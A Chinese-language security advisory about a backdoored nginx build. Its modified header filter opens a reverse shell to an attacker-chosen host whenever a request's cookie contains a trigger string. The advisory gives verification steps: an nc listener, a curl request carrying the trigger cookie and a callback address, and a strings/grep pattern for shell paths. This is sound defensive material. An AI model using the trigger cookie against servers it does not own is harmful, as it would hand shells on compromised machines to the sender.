「安全通告」新型 Nginx 后门

一、综述

近日,有安全厂商发布文章表示捕获到一款新型 nginx 后门,其免杀效果非常好,截至文章发布之时 VT 上的全部杀软都未能检测。

据分析,这款带后门的 nginx 修改了原版nginx中处理http头的函数ngx_http_header_filter,后门构造者对cookies字段进行了特殊处理,一旦请求中包含“lkfakjf”字符串,就会主动回连攻击者指定的服务器地址。

参考链接:

https://ti.dbappsecurity.com.cn/informationDetail?id=947

二、验证

2.1 网络验证

通过nc在本地监听9999端口:

$ nc -lv 9999

使用curl带上特殊cookie对本地地址发起请求:

$ curl "127.0.0.1" -H "Cookie:lkfakjfa0.0.0.0:9999"

如果在监听端口得到shell,说明本服务器的nginx已经被恶意替换。

2.2 本地验证

在 nginx 进程的绝对路径下执行如下命令,观察是否有输出,如有输出则说明存在异常:

strings nginx |grep -E '/bin/sh|/bin/ash|/bin/tcsh|/bin/ksh|/bin/zsh|/bin/csh|/bin/bash'

三、安全建议

从第三方平台下载并使用 Nginx 的用户建议尽快采用以上验证方法排查自身环境中的程序是否安全,如有异常,建议马上卸载,并对环境进行查杀。

尽可能确保所用软件来自官网,尽量避免从无法验证可靠性的第三方应用市场或其他渠道下载软件。

Spread the word. Share this post!

Meet The Author

Leave Comment